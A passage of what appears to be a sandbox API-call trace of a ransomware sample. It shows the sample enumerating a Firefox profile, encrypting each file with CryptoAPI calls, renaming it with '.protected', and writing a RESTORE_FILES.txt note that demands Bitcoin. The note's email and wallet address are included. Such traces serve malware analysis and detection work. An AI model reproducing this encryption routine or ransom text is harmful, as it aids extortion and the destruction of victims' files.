HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0090.732] StrStrIW (lpFirst="mimeTypes.rdf", lpSrch=".protected") returned 0x0 [0090.732] lstrcmpW (lpString1="mimeTypes.rdf", lpString2="RESTORE_FILES.txt") returned -1 [0090.732] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.732] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0090.733] StrStrW (lpFirst="mimeTypes.rdf", lpSrch=".txt") returned 0x0 [0090.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0090.733] StrStrW (lpFirst="mimeTypes.rdf", lpSrch=".rar") returned 0x0 [0090.733] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 105 [0090.733] StrStrW (lpFirst="mimeTypes.rdf", lpSrch=".zip") returned 0x0 [0090.733] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xef3, lpOverlapped=0x0) returned 1 [0090.768] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff10d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.768] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xef3, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xef3, lpOverlapped=0x0) returned 1 [0090.769] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.769] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.769] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.769] CloseHandle (hObject=0x154) returned 1 [0090.769] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.protected") returned 115 [0090.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.protected")) returned 1 [0090.770] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="Windows") returned -1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="Program Files") returned -1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="Program Files (x86)") returned -1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="$Recycle.bin") returned 1 [0090.770] lstrcmpiW (lpString1="minidumps", lpString2="System Volume Information") returned -1 [0090.770] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 101 [0090.770] lstrcmpW (lpString1="minidumps", lpString2=".") returned 1 [0090.770] lstrcmpW (lpString1="minidumps", lpString2="..") returned 1 [0090.770] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*") returned 103 [0090.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.771] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.771] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.771] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.771] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.771] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.771] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\.") returned 103 [0090.771] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.771] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.771] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.771] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.771] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.771] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.771] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.771] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\..") returned 104 [0090.772] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.772] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.772] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.772] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.772] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\RESTORE_FILES.txt") returned 119 [0090.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.772] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.772] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.773] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.773] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.773] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.773] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.773] CloseHandle (hObject=0x154) returned 1 [0090.774] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="Windows") returned -1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="Program Files") returned -1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="Program Files (x86)") returned -1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="$Recycle.bin") returned 1 [0090.774] lstrcmpiW (lpString1="parent.lock", lpString2="System Volume Information") returned -1 [0090.774] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0090.774] StrStrIW (lpFirst="parent.lock", lpSrch=".protected") returned 0x0 [0090.774] lstrcmpW (lpString1="parent.lock", lpString2="RESTORE_FILES.txt") returned -1 [0090.774] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.774] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0090.775] StrStrW (lpFirst="parent.lock", lpSrch=".txt") returned 0x0 [0090.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0090.775] StrStrW (lpFirst="parent.lock", lpSrch=".rar") returned 0x0 [0090.775] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned 103 [0090.775] StrStrW (lpFirst="parent.lock", lpSrch=".zip") returned 0x0 [0090.775] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0090.775] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.775] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x0, lpOverlapped=0x0) returned 1 [0090.775] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.775] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.776] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.776] CloseHandle (hObject=0x154) returned 1 [0090.776] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.protected") returned 113 [0090.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock.protected")) returned 1 [0090.777] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Windows") returned -1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Program Files") returned -1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Program Files (x86)") returned -1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="$Recycle.bin") returned 1 [0090.777] lstrcmpiW (lpString1="permissions.sqlite", lpString2="System Volume Information") returned -1 [0090.777] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0090.777] StrStrIW (lpFirst="permissions.sqlite", lpSrch=".protected") returned 0x0 [0090.777] lstrcmpW (lpString1="permissions.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.777] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0090.778] StrStrW (lpFirst="permissions.sqlite", lpSrch=".txt") returned 0x0 [0090.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0090.778] StrStrW (lpFirst="permissions.sqlite", lpSrch=".rar") returned 0x0 [0090.778] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned 110 [0090.778] StrStrW (lpFirst="permissions.sqlite", lpSrch=".zip") returned 0x0 [0090.778] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.788] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.788] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.788] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.788] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.789] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.789] CloseHandle (hObject=0x154) returned 1 [0090.789] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.protected") returned 120 [0090.789] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite.protected")) returned 1 [0090.790] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="Windows") returned -1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="Program Files") returned -1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="Program Files (x86)") returned -1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="$Recycle.bin") returned 1 [0090.790] lstrcmpiW (lpString1="places.sqlite", lpString2="System Volume Information") returned -1 [0090.790] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0090.790] StrStrIW (lpFirst="places.sqlite", lpSrch=".protected") returned 0x0 [0090.790] lstrcmpW (lpString1="places.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.790] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.790] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0090.791] StrStrW (lpFirst="places.sqlite", lpSrch=".txt") returned 0x0 [0090.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0090.791] StrStrW (lpFirst="places.sqlite", lpSrch=".rar") returned 0x0 [0090.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0090.791] StrStrW (lpFirst="places.sqlite", lpSrch=".zip") returned 0x0 [0090.791] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.793] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.793] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.793] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.793] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.909] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.909] CloseHandle (hObject=0x154) returned 1 [0090.909] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.protected") returned 115 [0090.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.protected")) returned 1 [0090.910] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Windows") returned -1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Program Files") returned -1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Program Files (x86)") returned -1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="$Recycle.bin") returned 1 [0090.910] lstrcmpiW (lpString1="pluginreg.dat", lpString2="System Volume Information") returned -1 [0090.910] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: 